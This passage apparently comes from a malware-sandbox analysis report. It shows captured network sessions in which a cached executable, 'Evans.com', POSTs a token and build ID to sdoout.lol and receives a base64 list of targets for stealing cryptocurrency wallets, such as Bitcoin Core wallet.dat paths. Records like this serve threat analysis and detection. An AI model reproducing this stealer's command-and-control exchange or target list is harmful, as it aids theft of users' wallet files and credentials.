                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:46 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                    42192.168.2.55012440.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 57 39 33 66 58 70 48 6b 45 57 4f 4e 37 31 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 61 33 38 63 30 39 35 31 39 39 66 66 33 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: uW93fXpHkEWON71f.1Context: 19a38c095199ff35
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 57 39 33 66 58 70 48 6b 45 57 4f 4e 37 31 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 61 33 38 63 30 39 35 31 39 39 66 66 33 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: uW93fXpHkEWON71f.2Context: 19a38c095199ff35<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 75 57 39 33 66 58 70 48 6b 45 57 4f 4e 37 31 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 61 33 38 63 30 39 35 31 39 39 66 66 33 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: uW93fXpHkEWON71f.3Context: 19a38c095199ff35<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:40 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:40 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2f 52 76 79 4f 43 31 6f 36 55 65 31 54 66 42 67 35 58 6b 58 67 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: /RvyOC1o6Ue1TfBg5XkXgg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    43192.168.2.550125116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:40 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----aieuknglfcbimyusrqi5
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 61 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------aieuknglfcbimyusrqi5Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------aieuknglfcbimyusrqi5Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------aieuknglfcbimyusrqi5Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:41 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:41 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    44192.168.2.550126116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:41 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----fc2no8yct00rqi58gvkx
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 66 63 32 6e 6f 38 79 63 74 30 30 72 71 69 35 38 67 76 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 66 63 32 6e 6f 38 79 63 74 30 30 72 71 69 35 38 67 76 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 66 63 32 6e 6f 38 79 63 74 30 30 72 71 69 35 38 67 76 6b 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------fc2no8yct00rqi58gvkxContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------fc2no8yct00rqi58gvkxContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------fc2no8yct00rqi58gvkxCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:42 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
